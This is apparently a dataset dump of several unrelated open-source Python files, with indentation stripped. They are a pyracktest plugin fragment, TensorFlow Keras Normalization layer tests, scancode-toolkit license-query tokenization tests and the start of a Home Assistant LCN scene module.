plugins.register('rpm', RPM)
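The _myIPForHost() helper above relies on a common trick worth spelling out: connecting a UDP socket sends no packets, but it makes the OS pick the outgoing interface, whose address can then be read back. In isolation (the peer address is just an example from the documentation range):

    import socket

    def local_ip_towards(peer_ip):
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            s.connect((peer_ip, 1))      # no traffic is actually sent
            return s.getsockname()[0]
        finally:
            s.close()

    # e.g. local_ip_towards('192.0.2.10') returns the local address routed towards that host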
| Stratoscale/pyracktest | py/strato/racktest/hostundertest/builtinplugins/rpm.py | Python | apache-2.0 | 1,467 |
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for keras.layers.preprocessing.normalization."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import numpy as np
from tensorflow.python import keras
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.eager import context
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.keras.layers.preprocessing import normalization
from tensorflow.python.keras.layers.preprocessing import normalization_v1
from tensorflow.python.keras.layers.preprocessing import preprocessing_test_utils
from tensorflow.python.keras.utils.generic_utils import CustomObjectScope
from tensorflow.python.platform import test
def get_layer_class():
if context.executing_eagerly():
return normalization.Normalization
else:
return normalization_v1.Normalization
def _get_layer_computation_test_cases():
test_cases = ({
"adapt_data": np.array([[1.], [2.], [3.], [4.], [5.]], dtype=np.float32),
"axis": -1,
"test_data": np.array([[1.], [2.], [3.]], np.float32),
"expected": np.array([[-1.414214], [-.707107], [0]], np.float32),
"testcase_name": "2d_single_element"
}, {
"adapt_data": np.array([[1.], [2.], [3.], [4.], [5.]], dtype=np.float32),
"axis": None,
"test_data": np.array([[1.], [2.], [3.]], np.float32),
"expected": np.array([[-1.414214], [-.707107], [0]], np.float32),
"testcase_name": "2d_single_element_none_axis"
}, {
"adapt_data": np.array([[1., 2., 3., 4., 5.]], dtype=np.float32),
"axis": None,
"test_data": np.array([[1.], [2.], [3.]], np.float32),
"expected": np.array([[-1.414214], [-.707107], [0]], np.float32),
"testcase_name": "2d_single_element_none_axis_flat_data"
}, {
"adapt_data":
np.array([[[1., 2., 3.], [2., 3., 4.]], [[3., 4., 5.], [4., 5., 6.]]],
np.float32),
"axis":
1,
"test_data":
np.array([[[1., 2., 3.], [2., 3., 4.]], [[3., 4., 5.], [4., 5., 6.]]],
np.float32),
"expected":
np.array([[[-1.549193, -0.774597, 0.], [-1.549193, -0.774597, 0.]],
[[0., 0.774597, 1.549193], [0., 0.774597, 1.549193]]],
np.float32),
"testcase_name":
"3d_internal_axis"
}, {
"adapt_data":
np.array(
[[[1., 0., 3.], [2., 3., 4.]], [[3., -1., 5.], [4., 5., 8.]]],
np.float32),
"axis": (1, 2),
"test_data":
np.array(
[[[3., 1., -1.], [2., 5., 4.]], [[3., 0., 5.], [2., 5., 8.]]],
np.float32),
"expected":
np.array(
[[[1., 3., -5.], [-1., 1., -1.]], [[1., 1., 1.], [-1., 1., 1.]]],
np.float32),
"testcase_name":
"3d_multiple_axis"
})
crossed_test_cases = []
# Cross above test cases with use_dataset in (True, False)
for use_dataset in (True, False):
for case in test_cases:
case = case.copy()
if use_dataset:
case["testcase_name"] = case["testcase_name"] + "_with_dataset"
case["use_dataset"] = use_dataset
crossed_test_cases.append(case)
return crossed_test_cases
@keras_parameterized.run_all_keras_modes
class NormalizationTest(keras_parameterized.TestCase,
preprocessing_test_utils.PreprocessingLayerTest):
def test_layer_api_compatibility(self):
cls = get_layer_class()
with CustomObjectScope({"Normalization": cls}):
output_data = testing_utils.layer_test(
cls,
kwargs={"axis": -1},
input_shape=(None, 3),
input_data=np.array([[3, 1, 2], [6, 5, 4]], dtype=np.float32),
validate_training=False,
adapt_data=np.array([[1, 2, 1], [2, 3, 4], [1, 2, 1], [2, 3, 4]]))
expected = np.array([[3., -3., -0.33333333], [9., 5., 1.]])
self.assertAllClose(expected, output_data)
def test_combiner_api_compatibility(self):
data = np.array([[1], [2], [3], [4], [5]])
combiner = normalization._NormalizingCombiner(axis=-1)
expected = {
"count": np.array(5.0),
"variance": np.array([2.]),
"mean": np.array([3.])
}
expected_accumulator = combiner._create_accumulator(expected["count"],
expected["mean"],
expected["variance"])
self.validate_accumulator_serialize_and_deserialize(combiner, data,
expected_accumulator)
self.validate_accumulator_uniqueness(combiner, data)
self.validate_accumulator_extract(combiner, data, expected)
self.validate_accumulator_extract_and_restore(combiner, data,
expected)
@parameterized.named_parameters(
{
"data": np.array([[1], [2], [3], [4], [5]]),
"axis": -1,
"expected": {
"count": np.array(5.0),
"variance": np.array([2.]),
"mean": np.array([3.])
},
"testcase_name": "2d_single_element"
}, {
"data": np.array([[1, 2], [2, 3], [3, 4], [4, 5], [5, 6]]),
"axis": -1,
"expected": {
"count": np.array(5.0),
"mean": np.array([3., 4.]),
"variance": np.array([2., 2.])
},
"testcase_name": "2d_multi_element"
}, {
"data": np.array([[[1, 2]], [[2, 3]], [[3, 4]], [[4, 5]], [[5, 6]]]),
"axis": 2,
"expected": {
"count": np.array(5.0),
"mean": np.array([3., 4.]),
"variance": np.array([2., 2.])
},
"testcase_name": "3d_multi_element"
}, {
"data": np.array([[[1, 2]], [[2, 3]], [[3, 4]], [[4, 5]], [[5, 6]]]),
"axis": (1, 2),
"expected": {
"count": np.array(5.0),
"mean": np.array([[3., 4.]]),
"variance": np.array([[2., 2.]])
},
"testcase_name": "3d_multi_element_multi_axis"
}, {
"data":
np.array([[[1, 2], [2, 3]], [[3, 4], [4, 5]], [[1, 2], [2, 3]],
[[3, 4], [4, 5]]]),
"axis":
1,
"expected": {
"count": np.array(8.0),
"mean": np.array([2.5, 3.5]),
"variance": np.array([1.25, 1.25])
},
"testcase_name":
"3d_multi_element_internal_axis"
})
def test_combiner_computation_multi_value_axis(self, data, axis, expected):
combiner = normalization._NormalizingCombiner(axis=axis)
expected_accumulator = combiner._create_accumulator(**expected)
self.validate_accumulator_computation(combiner, data, expected_accumulator)
@parameterized.named_parameters(*_get_layer_computation_test_cases())
def test_layer_computation(self, adapt_data, axis, test_data, use_dataset,
expected):
input_shape = tuple([None for _ in range(test_data.ndim - 1)])
if use_dataset:
# Keras APIs expect batched datasets
adapt_data = dataset_ops.Dataset.from_tensor_slices(adapt_data).batch(
test_data.shape[0] // 2)
test_data = dataset_ops.Dataset.from_tensor_slices(test_data).batch(
test_data.shape[0] // 2)
cls = get_layer_class()
layer = cls(axis=axis)
layer.adapt(adapt_data)
input_data = keras.Input(shape=input_shape)
output = layer(input_data)
model = keras.Model(input_data, output)
model._run_eagerly = testing_utils.should_run_eagerly()
output_data = model.predict(test_data)
self.assertAllClose(expected, output_data)
def test_mean_setting_continued_adapt_failure(self):
if not context.executing_eagerly():
self.skipTest("'assign' doesn't work in V1, so don't test in V1.")
cls = get_layer_class()
layer = cls(axis=-1)
layer.build((2,))
layer.mean.assign([1.3, 2.0])
with self.assertRaisesRegex(RuntimeError, "without also setting 'count'"):
layer.adapt(np.array([[1, 2]]), reset_state=False)
def test_var_setting_continued_adapt_failure(self):
if not context.executing_eagerly():
self.skipTest("'assign' doesn't work in V1, so don't test in V1.")
cls = get_layer_class()
layer = cls(axis=-1)
layer.build((2,))
layer.variance.assign([1.3, 2.0])
with self.assertRaisesRegex(RuntimeError, "without also setting 'count'"):
layer.adapt(np.array([[1, 2]]), reset_state=False)
def test_weight_setting_continued_adapt_failure(self):
cls = get_layer_class()
layer = cls(axis=-1)
layer.build((2,))
layer.set_weights([np.array([1.3, 2.0]), np.array([0.0, 1.0]), np.array(0)])
with self.assertRaisesRegex(RuntimeError, "without also setting 'count'"):
layer.adapt(np.array([[1, 2]]), reset_state=False)
def test_weight_setting_no_count_continued_adapt_failure(self):
cls = get_layer_class()
layer = cls(axis=-1)
layer.build((2,))
layer.set_weights([np.array([1.3, 2.0]), np.array([0.0, 1.0])])
with self.assertRaisesRegex(RuntimeError, "without also setting 'count'"):
layer.adapt(np.array([[1, 2]]), reset_state=False)
if __name__ == "__main__":
test.main()
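Outside the test harness, the adapt-then-normalize behaviour checked above looks roughly like the sketch below, using the public tf.keras API; the exact import path of the preprocessing layer varies between TensorFlow releases:

    import numpy as np
    import tensorflow as tf

    norm = tf.keras.layers.experimental.preprocessing.Normalization(axis=-1)
    norm.adapt(np.array([[1.], [2.], [3.], [4.], [5.]], dtype=np.float32))
    # mean is 3 and variance is 2, so 3 maps to ~0 and 1 maps to ~-1.414
    print(norm(np.array([[1.], [3.]], dtype=np.float32)))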
| gunan/tensorflow | tensorflow/python/keras/layers/preprocessing/normalization_test.py | Python | apache-2.0 | 10,124 |
#
# Copyright (c) 2016 nexB Inc. and others. All rights reserved.
# http://nexb.com and https://github.com/nexB/scancode-toolkit/
# The ScanCode software is licensed under the Apache License version 2.0.
# Data generated with ScanCode require an acknowledgment.
# ScanCode is a trademark of nexB Inc.
#
# You may not use this software except in compliance with the License.
# You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# When you publish or redistribute any data created with ScanCode or any ScanCode
# derivative work, you must accompany this data with the following acknowledgment:
#
# Generated with ScanCode and provided on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. No content created from
# ScanCode should be considered or used as legal advice. Consult an Attorney
# for any legal advice.
# ScanCode is a free software code scanning tool from nexB Inc. and others.
# Visit https://github.com/nexB/scancode-toolkit/ for support and download.
from __future__ import absolute_import, print_function
import os
from commoncode.testcase import FileBasedTesting
from licensedcode import index
from licensedcode.models import Rule
from licensedcode.query import Query
from licensedcode import models
TEST_DATA_DIR = os.path.join(os.path.dirname(__file__), 'data')
class IndexTesting(FileBasedTesting):
test_data_dir = TEST_DATA_DIR
def get_test_rules(self, base, subset=None):
base = self.get_test_loc(base)
test_files = sorted(os.listdir(base))
if subset:
test_files = [t for t in test_files if t in subset]
return [Rule(text_file=os.path.join(base, license_key), licenses=[license_key])
for license_key in test_files]
class TestQueryWithSingleRun(IndexTesting):
def test_Query_tokens_by_line_from_string(self):
rule_text = 'Redistribution and use in source and binary forms with or without modification are permitted'
idx = index.LicenseIndex([Rule(_text=rule_text, licenses=['bsd'])])
querys = '''
The
Redistribution and use in source and binary are permitted
Athena capital of Grece
Paris and Athene
Always'''
qry = Query(query_string=querys, idx=idx, _test_mode=True)
result = list(qry.tokens_by_line())
expected = [
[],
[None],
[11, 0, 6, 4, 3, 0, 1, 9, 2],
[],
[None, None, None, None],
[None, 0, None],
[None],
]
assert expected == result
# convert tid to actual token strings
qtbl_as_str = lambda qtbl: [[None if tid is None else idx.tokens_by_tid[tid] for tid in tids] for tids in qtbl]
result_str = qtbl_as_str(result)
expected_str = [
[],
[None],
['redistribution', 'and', 'use', 'in', 'source', 'and', 'binary', 'are', 'permitted'],
[],
[None, None, None, None],
[None, 'and', None],
[None],
]
assert expected_str == result_str
assert [3, 3, 3, 3, 3, 3, 3, 3, 3, 6] == qry.line_by_pos
idx = index.LicenseIndex([Rule(_text=rule_text, licenses=['bsd'])])
querys = 'and this is not a license'
qry = Query(query_string=querys, idx=idx, _test_mode=True)
result = list(qry.tokens_by_line())
expected = [['and', None, None, None, None, None]]
assert expected == qtbl_as_str(result)
def test_Query_tokenize_from_string(self):
rule_text = 'Redistribution and use in source and binary forms with or without modification are permitted'
idx = index.LicenseIndex([Rule(_text=rule_text, licenses=['bsd'])])
querys = '''
The
Redistribution and use in source and binary are permitted.
Athena capital of Grece
Paris and Athene
Always'''
qry = Query(query_string=querys, idx=idx, _test_mode=True)
qry.tokenize_and_build_runs(qry.tokens_by_line())
# convert tid to actual token strings
tks_as_str = lambda tks: [None if tid is None else idx.tokens_by_tid[tid] for tid in tks]
expected = ['redistribution', 'and', 'use', 'in', 'source', 'and', 'binary', 'are', 'permitted', 'and']
result = tks_as_str(qry.tokens)
assert expected == result
expected = [None, 'redistribution', 'and', 'use', 'in', 'source', 'and', 'binary', 'are', 'permitted', None, None, None, None, None, 'and', None, None]
result = tks_as_str(qry.tokens_with_unknowns())
assert expected == result
assert 1 == len(qry.query_runs)
qr1 = qry.query_runs[0]
assert 0 == qr1.start
assert 9 == qr1.end
assert 10 == len(qr1)
expected = ['redistribution', 'and', 'use', 'in', 'source', 'and', 'binary', 'are', 'permitted', 'and']
result = tks_as_str(qr1.tokens)
assert expected == result
expected = [None, 'redistribution', 'and', 'use', 'in', 'source', 'and', 'binary', 'are', 'permitted', None, None, None, None, None, 'and']
result = tks_as_str(qr1.tokens_with_unknowns())
assert expected == result
def test_QueryRuns_tokens_with_unknowns(self):
rule_text = 'Redistribution and use in source and binary forms with or without modification are permitted'
idx = index.LicenseIndex([Rule(_text=rule_text, licenses=['bsd'])])
querys = '''
The
Redistribution and use in source and binary are permitted.
Athena capital of Grece
Paris and Athene
Always'''
qry = Query(query_string=querys, idx=idx)
assert set([0, 1, 2, 3, 4, 5, 6, 7, 8, 9]) == set(qry.matchables)
assert 1 == len(qry.query_runs)
qrun = qry.query_runs[0]
# convert tid to actual token strings
tks_as_str = lambda tks: [None if tid is None else idx.tokens_by_tid[tid] for tid in tks]
expected = ['redistribution', 'and', 'use', 'in', 'source', 'and', 'binary', 'are', 'permitted', 'and']
assert expected == tks_as_str(qrun.tokens)
expected = [None, 'redistribution', 'and', 'use', 'in', 'source', 'and', 'binary', 'are', 'permitted', None, None, None, None, None, 'and']
assert expected == tks_as_str(qrun.tokens_with_unknowns())
assert 0 == qrun.start
assert 9 == qrun.end
def test_QueryRun_does_not_end_with_None(self):
rule_text = 'Redistribution and use in source and binary forms, with or without modification, are permitted'
idx = index.LicenseIndex([Rule(_text=rule_text, licenses=['bsd'])])
querys = '''
The
Redistribution and use in source and binary forms, with or without modification, are permitted.
Always
bar
modification
foo
'''
# convert tid to actual token strings
tks_as_str = lambda tks: [None if tid is None else idx.tokens_by_tid[tid] for tid in tks]
qry = Query(query_string=querys, idx=idx)
expected = [
None,
'redistribution', 'and', 'use', 'in', 'source', 'and', 'binary',
'forms', 'with', 'or', 'without', 'modification', 'are', 'permitted',
None, None,
'modification',
None
]
assert [x for x in expected if x] == tks_as_str(qry.tokens)
assert expected == tks_as_str(qry.tokens_with_unknowns())
assert 2 == len(qry.query_runs)
qrun = qry.query_runs[0]
expected = ['redistribution', 'and', 'use', 'in', 'source', 'and', 'binary', 'forms', 'with', 'or', 'without', 'modification', 'are', 'permitted']
assert expected == tks_as_str(qrun.tokens)
assert 0 == qrun.start
assert 13 == qrun.end
qrun = qry.query_runs[1]
expected = ['modification']
assert expected == tks_as_str(qrun.tokens)
assert 14 == qrun.start
assert 14 == qrun.end
def test_Query_from_real_index_and_location(self):
idx = index.LicenseIndex(self.get_test_rules('index/bsd'))
query_loc = self.get_test_loc('index/querytokens')
qry = Query(location=query_loc, idx=idx, line_threshold=4)
result = [qr.to_dict() for qr in qry.query_runs]
expected = [
{'end': 35,
'start': 0,
'tokens': (u'redistribution and use in source and binary forms '
u'redistributions of source code must the this that is not '
u'to redistributions in binary form must this software is '
u'provided by the copyright holders and contributors as is')
},
{'end': 36, 'start': 36, 'tokens': u'redistributions'}]
assert expected == result
expected_lbp = [
4, 4, 4, 4, 4, 4, 4, 4, 6, 6, 6, 6, 6, 7, 7, 7, 7, 7, 8,
9, 9, 9, 9, 9, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 15
]
assert expected_lbp == qry.line_by_pos
def test_query_and_index_tokens_are_identical_for_same_text(self):
rule_dir = self.get_test_loc('query/rtos_exact/')
from licensedcode.models import load_rules
idx = index.LicenseIndex(load_rules(rule_dir))
query_loc = self.get_test_loc('query/rtos_exact/gpl-2.0-freertos.RULE')
index_text_tokens = [idx.tokens_by_tid[t] for t in idx.tids_by_rid[0]]
qry = Query(location=query_loc, idx=idx, line_threshold=4)
wqry = qry.whole_query_run()
query_text_tokens = [idx.tokens_by_tid[t] for t in wqry.tokens]
assert index_text_tokens == query_text_tokens
assert u' '.join(index_text_tokens) == u' '.join(query_text_tokens)
def test_query_run_tokens_with_junk(self):
ranked_toks = lambda : ['the', 'is', 'a']
idx = index.LicenseIndex([Rule(_text='a is the binary')],
_ranked_tokens=ranked_toks)
assert 2 == idx.len_junk
assert {'a': 0, 'the': 1, 'binary': 2, 'is': 3, } == idx.dictionary
# two junks
q = Query(query_string='a the', idx=idx)
assert q.line_by_pos
qrun = q.query_runs[0]
assert [0, 1] == qrun.tokens
assert {} == qrun.query.unknowns_by_pos
# one junk
q = Query(query_string='a binary', idx=idx)
qrun = q.query_runs[0]
assert q.line_by_pos
assert [0, 2] == qrun.tokens
assert {} == qrun.query.unknowns_by_pos
# one junk
q = Query(query_string='binary the', idx=idx)
qrun = q.query_runs[0]
assert q.line_by_pos
assert [2, 1] == qrun.tokens
assert {} == qrun.query.unknowns_by_pos
# one unknown at start
q = Query(query_string='that binary', idx=idx)
qrun = q.query_runs[0]
assert q.line_by_pos
assert [2] == qrun.tokens
assert {-1: 1} == qrun.query.unknowns_by_pos
# one unknown at end
q = Query(query_string='binary that', idx=idx)
qrun = q.query_runs[0]
assert q.line_by_pos
assert [2] == qrun.tokens
assert {0: 1} == qrun.query.unknowns_by_pos
        # one unknown in the middle
q = Query(query_string='binary that a binary', idx=idx)
qrun = q.query_runs[0]
assert q.line_by_pos
assert [2, 0, 2] == qrun.tokens
assert {0: 1} == qrun.query.unknowns_by_pos
        # one unknown in the middle
q = Query(query_string='a binary that a binary', idx=idx)
qrun = q.query_runs[0]
assert q.line_by_pos
assert [0, 2, 0, 2] == qrun.tokens
assert {1: 1} == qrun.query.unknowns_by_pos
# two unknowns in the middle
q = Query(query_string='binary that was a binary', idx=idx)
qrun = q.query_runs[0]
assert q.line_by_pos
assert [2, 0, 2] == qrun.tokens
assert {0: 2} == qrun.query.unknowns_by_pos
# unknowns at start, middle and end
q = Query(query_string='hello dolly binary that was a binary end really', idx=idx)
# u u u u u u
qrun = q.query_runs[0]
assert q.line_by_pos
assert [2, 0, 2] == qrun.tokens
assert {-1: 2, 0: 2, 2: 2} == qrun.query.unknowns_by_pos
def test_query_tokens_are_same_for_different_text_formatting(self):
test_files = [self.get_test_loc(f) for f in [
'queryformat/license2.txt',
'queryformat/license3.txt',
'queryformat/license4.txt',
'queryformat/license5.txt',
'queryformat/license6.txt',
]]
rule_file = self.get_test_loc('queryformat/license1.txt')
idx = index.LicenseIndex([Rule(text_file=rule_file, licenses=['mit'])])
q = Query(location=rule_file, idx=idx)
assert 1 == len(q.query_runs)
expected = q.query_runs[0]
for tf in test_files:
q = Query(tf, idx=idx)
qr = q.query_runs[0]
assert expected.tokens == qr.tokens
def test_query_run_unknowns(self):
idx = index.LicenseIndex([Rule(_text='a is the binary')])
assert {'a': 0, 'binary': 1, 'is': 2, 'the': 3} == idx.dictionary
assert 2 == idx.len_junk
# multiple unknowns at start, middle and end
q = Query(query_string='that new binary was sure a kind of the real mega deal', idx=idx)
# known pos 0 1 2
# abs pos 0 1 2 3 4 5 6 7 8 9 10 11
expected = {
- 1: 2,
0: 2,
1: 2,
2: 3,
}
assert expected == dict(q.unknowns_by_pos)
class TestQueryWithMultipleRuns(IndexTesting):
def test_query_runs_from_location(self):
idx = index.LicenseIndex(self.get_test_rules('index/bsd'))
query_loc = self.get_test_loc('index/querytokens')
qry = Query(location=query_loc, idx=idx, line_threshold=3)
result = [q.to_dict(brief=True) for q in qry.query_runs]
expected = [
{
'start': 0,
'end': 35,
'tokens': u'redistribution and use in source ... holders and contributors as is'},
{
'start': 36,
'end': 36,
'tokens': u'redistributions'}
]
assert expected == result
def test_query_runs_three_runs(self):
idx = index.LicenseIndex(self.get_test_rules('index/bsd'))
query_loc = self.get_test_loc('index/queryruns')
qry = Query(location=query_loc, idx=idx)
expected = [
{'end': 84,
'start': 0,
'tokens': u'the redistribution and use in ... 2 1 3 c 4'},
{'end': 97,
'start': 85,
'tokens': u'this software is provided by ... holders and contributors as is'},
{'end': 98, 'start': 98, 'tokens': u'redistributions'}
]
result = [q.to_dict(brief=True) for q in qry.query_runs]
assert expected == result
def test_QueryRun(self):
idx = index.LicenseIndex([Rule(_text='redistributions in binary form must redistributions in')])
qry = Query(query_string='redistributions in binary form must redistributions in', idx=idx)
qruns = qry.query_runs
assert 1 == len(qruns)
qr = qruns[0]
# test
result = [idx.tokens_by_tid[tid] for tid in qr.tokens]
expected = ['redistributions', 'in', 'binary', 'form', 'must', 'redistributions', 'in']
assert expected == result
def test_query_runs_text_is_correct(self):
test_rules = self.get_test_rules('query/full_text/idx',)
idx = index.LicenseIndex(test_rules)
query_loc = self.get_test_loc('query/full_text/query')
qry = Query(location=query_loc, idx=idx, line_threshold=3)
qruns = qry.query_runs
result = [[u'<None>' if t is None else idx.tokens_by_tid[t] for t in qr.tokens_with_unknowns()] for qr in qruns]
expected = [
u'<None> <None> <None> this'.split(),
u'''redistribution and use in source and binary forms with or
without modification are permitted provided that the following
conditions are met redistributions of source code must retain the
above copyright notice this list of conditions and the following
disclaimer redistributions in binary form must reproduce the above
copyright notice this list of conditions and the following
disclaimer in the documentation and or other materials provided with
the distribution neither the name of <None> inc nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission this
software is provided by the copyright holders and contributors as is
and any express or implied warranties including but not limited to
the implied warranties of merchantability and fitness for a
particular purpose are disclaimed in no event shall the copyright
owner or contributors be liable for any direct indirect incidental
special exemplary or consequential damages including but not limited
to procurement of substitute goods or services loss of use data or
profits or business interruption however caused and on any theory of
liability whether in contract strict liability or tort including
negligence or otherwise arising in any way out of the use of this
software even if advised of the possibility of such damage'''.split(),
u'no <None> of'.split(),
]
assert expected == result
def test_query_runs_with_plain_rule(self):
rule_text = u'''X11 License
Copyright (C) 1996 X Consortium Permission is hereby granted, free
of charge, to any person obtaining a copy of this software and
associated documentation files (the "Software"), to deal in the
Software without restriction, including without limitation the
rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom
the Software is furnished to do so, subject to the following
conditions: The above copyright notice and this permission notice
shall be included in all copies or substantial portions of the
Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE X CONSORTIUM BE LIABLE FOR
ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
Except as contained in this notice, the name of the X Consortium
shall not be used in advertising or otherwise to promote the sale,
use or other dealings in this Software without prior written
authorization from the X Consortium. X Window System is a trademark
of X Consortium, Inc.
'''
rule = Rule(_text=rule_text, licenses=['x-consortium'])
idx = index.LicenseIndex([rule])
query_loc = self.get_test_loc('detect/simple_detection/x11-xconsortium_text.txt')
qry = Query(location=query_loc, idx=idx)
result = [q.to_dict(brief=False) for q in qry.query_runs]
expected = [{
'start': 0,
'end': 216,
'tokens':(
u'x11 license copyright c 1996 x consortium permission is hereby '
u'granted free of charge to any person obtaining a copy of this '
u'software and associated documentation files the software to deal in '
u'the software without restriction including without limitation the '
u'rights to use copy modify merge publish distribute sublicense and or '
u'sell copies of the software and to permit persons to whom the '
u'software is furnished to do so subject to the following conditions '
u'the above copyright notice and this permission notice shall be '
u'included in all copies or substantial portions of the software the '
u'software is provided as is without warranty of any kind express or '
u'implied including but not limited to the warranties of '
u'merchantability fitness for a particular purpose and noninfringement '
u'in no event shall the x consortium be liable for any claim damages or '
u'other liability whether in an action of contract tort or otherwise '
u'arising from out of or in connection with the software or the use or '
u'other dealings in the software except as contained in this notice the '
u'name of the x consortium shall not be used in advertising or '
u'otherwise to promote the sale use or other dealings in this software '
u'without prior written authorization from the x consortium x window '
u'system is a trademark of x consortium inc'
)
}]
assert 217 == len(qry.query_runs[0].tokens)
assert expected == result
def test_query_run_has_correct_offset(self):
rule_dir = self.get_test_loc('query/runs/rules')
rules = list(models.load_rules(rule_dir))
idx = index.LicenseIndex(rules)
query_doc = self.get_test_loc('query/runs/query.txt')
q = Query(location=query_doc, idx=idx, line_threshold=4)
result = [qr.to_dict() for qr in q.query_runs]
expected = [
{'end': 0, 'start': 0, 'tokens': u'inc'},
{
'end': 123,
'start': 1,
'tokens': (
u'this library is free software you can redistribute it and or modify '
u'it under the terms of the gnu library general public license as '
u'published by the free software foundation either version 2 of the '
u'license or at your option any later version this library is '
u'distributed in the hope that it will be useful but without any '
u'warranty without even the implied warranty of merchantability or '
u'fitness for a particular purpose see the gnu library general public '
u'license for more details you should have received a copy of the gnu '
u'library general public license along with this library see the file '
u'copying lib if not write to the free software foundation inc 51 '
u'franklin street fifth floor boston ma 02110 1301 usa'
)
}]
assert expected == result
class TestQueryWithFullIndex(FileBasedTesting):
test_data_dir = TEST_DATA_DIR
def test_query_from_binary_lkms_1(self):
location = self.get_test_loc('query/ath_pci.ko')
idx = index.get_index()
result = Query(location, idx=idx)
assert len(result.query_runs) < 15
def test_query_from_binary_lkms_2(self):
location = self.get_test_loc('query/eeepc_acpi.ko')
idx = index.get_index()
result = Query(location, idx=idx)
assert len(result.query_runs) < 500
qrs = result.query_runs[5:10]
assert any('license gpl' in u' '.join(idx.tokens_by_tid[t] for t in qr.matchable_tokens())
for qr in qrs)
def test_query_from_binary_lkms_3(self):
location = self.get_test_loc('query/wlan_xauth.ko')
idx = index.get_index()
result = Query(location, idx=idx)
assert len(result.query_runs) < 900
qr = result.query_runs[0]
assert 'license dual bsd gpl' in u' '.join(idx.tokens_by_tid[t] for t in qr.matchable_tokens())
def test_query_run_tokens(self):
query_s = u' '.join(u''' 3 unable to create proc entry license gpl
description driver author eric depends 2 6 24 19 generic smp mod module acpi
baridationally register driver proc acpi disabled acpi install notify acpi baridationally get
status cache caches create proc entry baridationally generate proc event acpi evaluate
object acpi remove notify remove proc entry acpi baridationally driver acpi acpi gcc gnu
4 2 3 ubuntu 4 2 3 gcc gnu 4 2 3 ubuntu 4 2 3 current stack pointer current
stack pointer this module end usr src modules acpi include linux include asm
include asm generic include acpi acpi c posix types 32 h types h types h h h
h h
'''.split())
idx = index.get_index()
result = Query(query_string=query_s, idx=idx)
assert 1 == len(result.query_runs)
qr = result.query_runs[0]
# NOTE: this is not a token present in any rules or licenses
unknown_token = u'baridationally'
assert unknown_token not in idx.dictionary
assert u' '.join([t for t in query_s.split() if t not in (unknown_token, 'proc')]) == u' '.join(idx.tokens_by_tid[t] for t in qr.tokens)
def test_query_run_tokens_matchable(self):
query_s = u' '.join(u'''
3 unable to create proc entry license gpl description driver author eric
depends 2 6 24 19 generic smp mod module acpi baridationally register driver
proc acpi disabled acpi install notify acpi baridationally get status cache
caches create proc entry baridationally generate proc event acpi evaluate
object acpi remove notify remove proc entry acpi baridationally driver acpi
acpi gcc gnu 4 2 3 ubuntu 4 2 3 gcc gnu 4 2 3 ubuntu 4 2 3 current stack
pointer current stack pointer this module end usr src modules acpi include
linux include asm include asm generic include acpi acpi c posix types 32 h
types h types h h h h h
'''.split())
idx = index.get_index()
result = Query(query_string=query_s, idx=idx)
assert 1 == len(result.query_runs)
qr = result.query_runs[0]
expected_qr0 = u' '.join(u'''
3 unable to create entry license gpl description driver author eric depends 2
6 24 19 generic smp mod module acpi register driver acpi disabled acpi
install notify acpi get status cache caches create entry generate event acpi
evaluate object acpi remove notify remove entry acpi driver acpi acpi gcc gnu
4 2 3 ubuntu 4 2 3 gcc gnu 4 2 3 ubuntu 4 2 3 current stack pointer current
stack pointer this module end usr src modules acpi include linux include asm
include asm generic include acpi acpi c posix types 32 h types h types h h h
h h
'''.split())
assert expected_qr0 == u' '.join(idx.tokens_by_tid[t] for t in qr.tokens)
# NOTE: this is not a token present in any rules or licenses
unknown_token = u'baridationally'
assert unknown_token not in idx.dictionary
assert expected_qr0 == u' '.join(idx.tokens_by_tid[t] for p, t in enumerate(qr.tokens) if p in qr.matchables)
expected = u'gpl'
assert expected == u' '.join(idx.tokens_by_tid[t] for p, t in enumerate(qr.tokens) if p in qr.high_matchables)
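The pattern these tests repeat, building a LicenseIndex from rules and tokenizing a query against it, reduces to a short sketch (assuming a scancode-toolkit development checkout; the rule text is illustrative):

    from licensedcode import index
    from licensedcode.models import Rule
    from licensedcode.query import Query

    idx = index.LicenseIndex([Rule(_text='redistribution and use are permitted', licenses=['bsd'])])
    qry = Query(query_string='Redistribution and use are permitted.', idx=idx)
    run = qry.query_runs[0]
    print([idx.tokens_by_tid[t] for t in run.tokens])
    # expected: ['redistribution', 'and', 'use', 'are', 'permitted']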
| yasharmaster/scancode-toolkit | tests/licensedcode/test_query.py | Python | apache-2.0 | 28,212 |
"""Support for LCN scenes."""
import pypck
from homeassistant.components.scene import DOMAIN as DOMAIN_SCENE, Scene
from homeassistant.const import CONF_ADDRESS, CONF_DOMAIN, CONF_ENTITIES, CONF_SCENE
from . import LcnEntity
from .const import (
